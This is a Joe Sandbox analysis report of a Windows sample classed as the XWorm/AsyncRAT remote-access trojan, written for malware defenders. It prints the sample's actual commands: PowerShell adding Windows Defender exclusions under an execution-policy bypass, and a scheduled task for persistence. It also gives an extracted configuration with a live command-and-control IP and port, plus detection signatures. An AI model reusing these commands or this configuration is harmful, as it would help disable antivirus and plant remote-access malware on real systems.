Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5q4X9fRo4b.exe

Overview

General Information

Sample name:5q4X9fRo4b.exe
renamed because original name is a hash value
Original sample name:af9ce09585744c97e4c856c8e6124d8a842714dfd5101e27eaff721220679802.exe
Analysis ID:1530274
MD5:9425780161c1cb105cd206d3f4fc6fa8
SHA1:20608510ef22b09e5e874268b61d726ac0218c45
SHA256:af9ce09585744c97e4c856c8e6124d8a842714dfd5101e27eaff721220679802
Tags:exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 5q4X9fRo4b.exe (PID: 1408 cmdline: "C:\Users\user\Desktop\5q4X9fRo4b.exe" MD5: 9425780161C1CB105CD206D3F4FC6FA8)
    • powershell.exe (PID: 6408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5q4X9fRo4b.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser32.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 8116 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SystemUser32.exe (PID: 8164 cmdline: C:\Users\user\AppData\Roaming\SystemUser32.exe MD5: 9425780161C1CB105CD206D3F4FC6FA8)
  • SystemUser32.exe (PID: 1916 cmdline: "C:\Users\user\AppData\Roaming\SystemUser32.exe" MD5: 9425780161C1CB105CD206D3F4FC6FA8)
  • SystemUser32.exe (PID: 1316 cmdline: C:\Users\user\AppData\Roaming\SystemUser32.exe MD5: 9425780161C1CB105CD206D3F4FC6FA8)
  • SystemUser32.exe (PID: 3020 cmdline: "C:\Users\user\AppData\Roaming\SystemUser32.exe" MD5: 9425780161C1CB105CD206D3F4FC6FA8)
  • cleanup

Malware Configuration

Threatname: Xworm

{"C2 url": ["147.185.221.17"], "Port": "10406", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
5q4X9fRo4b.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    5q4X9fRo4b.exeJoeSecurity_XWormYara detected XWormJoe Security
      5q4X9fRo4b.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        5q4X9fRo4b.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x83ba:$s6: VirtualBox
        • 0x8318:$s8: Win32_ComputerSystem
        • 0x8d80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x8e1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x8f32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x89f8:$cnc4: POST / HTTP/1.1

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Roaming\SystemUser32.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          C:\Users\user\AppData\Roaming\SystemUser32.exeJoeSecurity_XWormYara detected XWormJoe Security
            C:\Users\user\AppData\Roaming\SystemUser32.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              C:\Users\user\AppData\Roaming\SystemUser32.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x83ba:$s6: VirtualBox
              • 0x8318:$s8: Win32_ComputerSystem
              • 0x8d80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8e1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x8f32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x89f8:$cnc4: POST / HTTP/1.1

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000002.2502473225.0000000002F8A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                    00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x81ba:$s6: VirtualBox
                    • 0x8118:$s8: Win32_ComputerSystem
                    • 0x8b80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x8c1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x8d32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x87f8:$cnc4: POST / HTTP/1.1
                    00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                      Click to see the 1 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.5q4X9fRo4b.exe.d30000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                        0.0.5q4X9fRo4b.exe.d30000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                          0.0.5q4X9fRo4b.exe.d30000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                            0.0.5q4X9fRo4b.exe.d30000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                            • 0x83ba:$s6: VirtualBox
                            • 0x8318:$s8: Win32_ComputerSystem
                            • 0x8d80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                            • 0x8e1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                            • 0x8f32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                            • 0x89f8:$cnc4: POST / HTTP/1.1

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\5q4X9fRo4b.exe", ParentImage: C:\Users\user\Desktop\5q4X9fRo4b.exe, ParentProcessId: 1408, ParentProcessName: 5q4X9fRo4b.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', ProcessId: 6408, ProcessName: powershell.exe
                            Sigma detected: Change PowerShell Policies to an Insecure Level
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\5q4X9fRo4b.exe", ParentImage: C:\Users\user\Desktop\5q4X9fRo4b.exe, ParentProcessId: 1408, ParentProcessName: 5q4X9fRo4b.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', ProcessId: 6408, ProcessName: powershell.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\SystemUser32.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\5q4X9fRo4b.exe, ProcessId: 1408, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUser32
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\5q4X9fRo4b.exe", ParentImage: C:\Users\user\Desktop\5q4X9fRo4b.exe, ParentProcessId: 1408, ParentProcessName: 5q4X9fRo4b.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', ProcessId: 6408, ProcessName: powershell.exe
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\5q4X9fRo4b.exe, ProcessId: 1408, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser32.lnk
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\5q4X9fRo4b.exe", ParentImage: C:\Users\user\Desktop\5q4X9fRo4b.exe, ParentProcessId: 1408, ParentProcessName: 5q4X9fRo4b.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe", ProcessId: 8116, ProcessName: schtasks.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\5q4X9fRo4b.exe", ParentImage: C:\Users\user\Desktop\5q4X9fRo4b.exe, ParentProcessId: 1408, ParentProcessName: 5q4X9fRo4b.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', ProcessId: 6408, ProcessName: powershell.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-09T23:05:13.613687+020028528701Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            2024-10-09T23:05:14.081790+020028528701Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            2024-10-09T23:05:26.994236+020028528701Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            2024-10-09T23:05:39.903187+020028528701Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            2024-10-09T23:05:43.622791+020028528701Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            2024-10-09T23:05:52.835200+020028528701Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            2024-10-09T23:06:05.732794+020028528701Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            2024-10-09T23:06:13.629708+020028528701Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            2024-10-09T23:06:14.794101+020028528701Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-09T23:05:14.091945+020028529231Malware Command and Control Activity Detected192.168.2.749933147.185.221.1710406TCP
                            2024-10-09T23:05:26.995996+020028529231Malware Command and Control Activity Detected192.168.2.749933147.185.221.1710406TCP
                            2024-10-09T23:05:39.905710+020028529231Malware Command and Control Activity Detected192.168.2.749933147.185.221.1710406TCP
                            2024-10-09T23:05:52.837470+020028529231Malware Command and Control Activity Detected192.168.2.749933147.185.221.1710406TCP
                            2024-10-09T23:06:05.734423+020028529231Malware Command and Control Activity Detected192.168.2.749933147.185.221.1710406TCP
                            2024-10-09T23:06:14.794890+020028529231Malware Command and Control Activity Detected192.168.2.749933147.185.221.1710406TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-09T23:05:13.613687+020028528741Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            2024-10-09T23:05:43.622791+020028528741Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            2024-10-09T23:06:13.629708+020028528741Malware Command and Control Activity Detected147.185.221.1710406192.168.2.749933TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-09T23:05:13.801889+020028559241Malware Command and Control Activity Detected192.168.2.749933147.185.221.1710406TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: 5q4X9fRo4b.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeAvira: detection malicious, Label: TR/Spy.Gen
                            Found malware configuration
                            Source: 5q4X9fRo4b.exeMalware Configuration Extractor: Xworm {"C2 url": ["147.185.221.17"], "Port": "10406", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeReversingLabs: Detection: 84%
                            Multi AV Scanner detection for submitted file
                            Source: 5q4X9fRo4b.exeReversingLabs: Detection: 84%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: 5q4X9fRo4b.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 5q4X9fRo4b.exeString decryptor: 147.185.221.17
                            Source: 5q4X9fRo4b.exeString decryptor: 10406
                            Source: 5q4X9fRo4b.exeString decryptor: <123456789>
                            Source: 5q4X9fRo4b.exeString decryptor: <Xwormmm>
                            Source: 5q4X9fRo4b.exeString decryptor: XWorm V5.6
                            Source: 5q4X9fRo4b.exeString decryptor: USB.exe
                            Source: 5q4X9fRo4b.exeString decryptor: %AppData%
                            Source: 5q4X9fRo4b.exeString decryptor: SystemUser32.exe
                            Source: 5q4X9fRo4b.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 5q4X9fRo4b.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.17:10406 -> 192.168.2.7:49933
                            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.17:10406 -> 192.168.2.7:49933
                            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49933 -> 147.185.221.17:10406
                            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49933 -> 147.185.221.17:10406
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 147.185.221.17
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.7:49933 -> 147.185.221.17:10406
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.17
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: powershell.exe, 0000000C.00000002.1436589079.0000022BB15AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mQo
                            Source: 5q4X9fRo4b.exe, SystemUser32.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: powershell.exe, 00000008.00000002.1333269390.000001C8ED9C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1422781549.0000022BA8EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1565537713.0000024CB0050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000008.00000002.1340691881.000001C8F5FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic5d
                            Source: powershell.exe, 00000008.00000002.1318985953.000001C8DDB79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B990A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024CA020A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: 5q4X9fRo4b.exe, 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1318985953.000001C8DD951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B98E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024C9FFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000008.00000002.1318985953.000001C8DDB79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B990A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024CA020A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000000C.00000002.1436589079.0000022BB15AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwoft.com/pki/cert
                            Source: powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000008.00000002.1341620056.000001C8F619F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coU
                            Source: powershell.exe, 00000008.00000002.1318985953.000001C8DD951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B98E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024C9FFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
